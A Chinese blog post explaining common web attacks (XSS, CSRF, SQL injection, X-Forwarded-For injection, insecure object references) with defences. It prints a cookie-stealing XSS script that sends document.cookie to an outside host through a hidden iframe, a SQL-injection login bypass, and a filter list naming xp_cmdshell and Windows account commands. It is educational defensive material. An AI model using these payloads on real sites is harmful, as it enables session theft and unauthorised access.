摘要:前言一直以来自己对安全方面的知识了解的比较少,最近有点闲工夫了解了一下。攻击的一般是由服务端解决。攻击条件登录受信任网站,并在本地生成。验证对所有引用对象的授权。
前言一直以来自己对WEB安全方面的知识了解的比较少,最近有点闲工夫了解了一下。也是为了以后面试吧,之前就遇到过问WEB安全方面的问题,答的不是很理想,所以整理了一下!
一、XSS攻击跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意的Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
特点:尽一切办法在目标网站上执行非目标网站上原有的脚本。
使用js或css破坏页面正常的结构与样式
通过document.cookie盗取cookie,实现无密码访问
流量劫持(通过访问某段具有window.location.href定位到其他页面)
Dos攻击:利用合理的客户端请求来占用过多的服务器资源,从而使合法用户无法得到服务器响应。
利用iframe、frame、XMLHttpRequest或上述Flash等方式,以(被攻击)用户的身份执行一些管理动作,或执行一些一般的如发微博、加好友、发私信等操作。
利用可被攻击的域受到其他域信任的特点,以受信任来源的身份请求一些平时不允许的操作,如进行不当的投票活动。
1. Reflected XSS(基于反射的XSS攻击)
非持久型,反射型 XSS 漏洞常见于通过 URL 传递参数的功能,如网站搜索、跳转等。由于需要用户主动打开恶意的 URL 才能生效,攻击者往往会结合多种手段诱导用户点击。POST 的内容也可以触发反射型 XSS,只不过其触发条件比较苛刻(需要构造表单提交页面,并引导用户点击),所以非常少见。
反射型 XSS 的攻击步骤:
攻击者构造出特殊的 URL,其中包含恶意代码。
用户打开带有恶意代码的 URL 时,网站服务端将恶意代码从 URL 中取出,拼接在 HTML 中返回给浏览器。
用户浏览器接收到响应后解析执行,混在其中的恶意代码也被执行。
恶意代码窃取用户数据并发送到攻击者的网站,或者冒充用户的行为,调用目标网站接口执行攻击者指定的操作。
2. Stored XSS(基于存储的XSS攻击)
持久型,这种攻击常见于带有用户保存数据的网站功能,如论坛发帖、商品评论、用户私信等。
存储型 XSS 的攻击步骤:
攻击者将恶意代码提交到目标网站的数据库中。
用户打开目标网站时,网站服务端将恶意代码从数据库取出,拼接在 HTML 中返回给浏览器。
用户浏览器接收到响应后解析执行,混在其中的恶意代码也被执行。
恶意代码窃取用户数据并发送到攻击者的网站,或者冒充用户的行为,调用目标网站接口执行攻击者指定的操作。
3. DOM-based or local XSS(基于DOM或本地的XSS攻击)
般是提供一个免费的wifi,但是提供免费wifi的网关会往你访问的任何页面插入一段脚本或者是直接返回一个钓鱼页面,从而植入恶意脚本。这种直接存在于页面,无须经过服务器返回就是基于本地的XSS攻击。
DOM 型 XSS 的攻击步骤:
攻击者构造出特殊的 URL,其中包含恶意代码。
用户打开带有恶意代码的 URL。
用户浏览器接收到响应后解析执行,前端 JavaScript 取出 URL 中的恶意代码并执行。
恶意代码窃取用户数据并发送到攻击者的网站,或者冒充用户的行为,调用目标网站接口执行攻击者指定的操作。
使用xss弹出恶意警告框,代码为:
<script>alert("xss")script>
xss输入也可能是html代码段,如果使网页不停的刷新,代码为:
<meta http-equiv="refresh" content="0;">
嵌入其他网站链接的代码为:
<iframe src="http://www.jsay.org" width=0 height=0>iframe>
JavaScript 写一个请求跨站的脚本就是XSS了,如下:
<script type="text/javascript">
(function(window, document) {
// 构造泄露信息用的 URL
var cookies = document.cookie;
var xssURIBase = "http://www.jsay.org/xss/";
var xssURI = xssURIBase + window.encodeURI(cookies);
// 建立隐藏 iframe 用于通讯
var hideFrame = document.createElement("iframe");
hideFrame.height = 0;
hideFrame.width = 0;
hideFrame.style.display = "none";
hideFrame.src = xssURI;
// 开工
document.body.appendChild(hideFrame);
})(window, document);
script>
思路:对输入(和URL参数)进行过滤,对输出进行编码。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击。
对输入、URL参数等(如:<>、/ 、&、"、" )进行转义、过滤,仅接受指定长度范围内并符合我们期望格式的的内容提交,阻止或者忽略除此外的其他任何数据;
输出数据之前对潜在的威胁的字符进行编码、转义;
XSS 一般利用js脚步读取用户浏览器中的Cookie,而如果在服务器端对 Cookie 设置了HttpOnly 属性,那么js脚本就不能读取到cookie,但是浏览器还是能够正常使用cookie。
设置黑、白名单;
Content Security Policy 的实质就是白名单制度,开发者明确告诉客户端,哪些外部资源可以加载和执行,等同于提供白名单。它的实现和执行全部由浏览器完成,开发者只需提供配置。
CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装成受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性。
本质原因:CSRF攻击是源于Web的隐式身份验证机制。Web的身份验证机制虽然可以保证一个请求是来自于某个用户的浏览器,但却无法保证该请求是用户批准发送的。CSRF攻击的一般是由服务端解决。
CSRF攻击条件:
登录受信任网站A,并在本地生成Cookie。
在不登出A的情况下,访问危险网站B。
虽然有些时候你访问B网站的时候,并没有访问A网站,但是你并不能保证之前登录过A网站的本地Cookie已过期,这个时候B网站一样是可以发起攻击。 CSRF攻击是源于WEB的隐式身份验证机制!WEB的身份验证机制虽然可以保证一个请求是来自于某个用户的浏览器,但却无法保证该请求是用户批准发送的!
Cookie Hashing(所有表单都包含同一个伪随机值);
验证码;
One-Time Tokens(不同的表单包含一个不同的伪随机值);
不让第三方网站访问到用户 Cookie,阻止第三方网站请求接口。
通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。
SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。
简单举例:
// 前端给后端post键值对,登录的用户名和密码
let data = {
username: "admin",
pwd: "abc123456"
}
// 后端的sql语句
SELECT * FROM user WHERE username="${username}" AND psw="${pwd}"
这个时候前端的 username 别人输入 admin" -- ;这个时候查询的 SQL 语句就变成这样子了:
SELECT * FROM user WHERE username="admin" -- AND psw="${pwd}"
Ps: -- 在SQL语句里面是注释,也就是说登录的查询条件变成了不需要验证密码!
永远不要信任用户的输入。对用户的输入进行校验,可以通过正则表达式,或限制长度;对单引号和 双"-"进行转换等。
永远不要使用动态拼装sql,可以使用参数化的sql或者直接使用存储过程进行数据查询存取。
永远不要使用管理员权限的数据库连接,为每个应用使用多带带的权限有限的数据库连接。
不要把机密信息直接存放,加密或者hash掉密码和敏感的信息。
应用的异常信息应该给出尽可能少的提示,最好使用自定义的错误信息对原始错误信息进行包装
sql注入的检测方法一般采取辅助软件或网站平台来检测,软件一般采用sql注入检测工具jsky,网站平台就有亿思网站安全平台检测工具。MDCSOFT SCAN等。采用MDCSOFT-IPS可以有效的防御SQL注入,XSS攻击等。
X-Forwarded-for的缩写,XFF注入是SQL注入的一种,该注入原理是通过修改X-Forwarded-for头对带入系统的dns进行sql注入,从而得到网站的数据库内容。
过滤http头中的X-Forwarded-for header中的内容,不允许其插入敏感字符,过滤字符参考sql注入修复方案。
过滤以下敏感字符。需要过滤的特殊字符及字符串有:
net user
xp_cmdshell
add
exec master.dbo.xp_cmdshell
net localgroup administrators
select
count
Asc
char
mid
"
:
"
insert
delete from
drop table
update
truncate
from
%
当开发人员公开对内部实现对象的引用(例如URL或FORM参数中的文件,目录或数据库键)时,就会发生这种情况。攻击者可以使用此信息访问其他对象,并可以创建将来的攻击来访问未经授权的数据。
简单举例: 更改以下URL中的 userid 可以使攻击者查看其他用户的信息。 http://www.jsay.org/userid=123 修改为 http://www.jsay.org/userid=124 攻击者可以通过更改用户标识值来查看其他信息。或者文件允许下载访问 http://www.jsay.org/a.txt ,但是通过 http://www.jsay.org/b.txt 可以看到不允许访问的文件!
实施访问控制检查。
避免在URL中公开对象引用。
验证对所有引用对象的授权。
处理用户(客户端)和服务器(应用程序)之间的信息交换。应用程序经常通过网络传输敏感信息,如身份验证详细信息,信用卡信息和会话令牌。通过使用弱算法或使用过期或无效的证书或不使用SSL,可以允许将通信暴露给不受信任的用户,这可能会危及Web应用程序和/或窃取敏感信息。
启用安全HTTP并仅通过HTTPS强制执行凭据传输。
确保您的证书有效且未过期。
我自己运营的公众号,记录我自己的成长
公众号:前端曰
公众号ID:js-say
ps:是(yue)不是(ri)
文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。
转载请注明本文地址:https://www.ucloud.cn/yun/7365.html
摘要:前言一直以来自己对安全方面的知识了解的比较少,最近有点闲工夫了解了一下。攻击的一般是由服务端解决。攻击条件登录受信任网站,并在本地生成。验证对所有引用对象的授权。 前言 一直以来自己对WEB安全方面的知识了解的比较少,最近有点闲工夫了解了一下。也是为了以后面试吧,之前就遇到过问WEB安全方面的问题,答的不是很理想,所以整理了一下! 一、XSS攻击 跨站脚本攻击(Cross Site ...
摘要:联想企业网盘版本可实现指定类型文件一键智能自动同步到用户的网盘个人空间,保护用户个人数据。在技术和产品上,联想企业网盘始终坚持创新驱动发展。在中国企业网盘市场上,玩家类型众多,包括IT厂商、SaaS类创业企业、互联网厂商、企业软件厂商和运营商,竞争激烈。既有BAT这样的大咖,也有层出不穷的创业公司,而联想企业网盘始终保持着稳健、快速的成长,至今连续5年占据40%的市场份额,一骑绝尘。6月19...
摘要:夏华夏先生以美团发展的五个阶段为演讲主线,分别介绍每个阶段中所遇到的问题及解决方案。在夏华夏先生的分享之后,第五届开幕式圆满结束,他山之石可以攻玉是的宗旨,我们希望通过优秀案例的分享传播更多的经验。 showImg(https://segmentfault.com/img/bVHgPK?w=629&h=418);(第五届TOP100summit开幕式现场) 12月09日-12日,由ms...
摘要:夏华夏先生以美团发展的五个阶段为演讲主线,分别介绍每个阶段中所遇到的问题及解决方案。在夏华夏先生的分享之后,第五届开幕式圆满结束,他山之石可以攻玉是的宗旨,我们希望通过优秀案例的分享传播更多的经验。 showImg(https://segmentfault.com/img/bVHgPK?w=629&h=418);(第五届TOP100summit开幕式现场) 12月09日-12日,由ms...
六月精阳,人们的火气难免旺了些,连全球知名品牌也失去了风度,不再温良恭俭让,把过去私下里的暗战摆在台面上互怼。6月23日,全球零售霸主美国沃尔玛私下要求合作厂商,包括技术供应商、电商和批发商,停止使用亚马逊云计算服务(Amazon Web System,AWS);而亚马逊发言人则在6月27日公开谴责称,沃尔玛是在用自己采购的权限控制供应商,这完全是霸凌(Bully)行为。无独有偶,上月初,中国也有...
阅读 3121·2021-11-11 16:54
阅读 2260·2021-09-04 16:48
阅读 3194·2019-08-29 16:08
阅读 622·2019-08-29 15:13
阅读 1315·2019-08-29 15:09
阅读 2641·2019-08-29 12:45
阅读 1905·2019-08-29 12:12
阅读 426·2019-08-26 18:27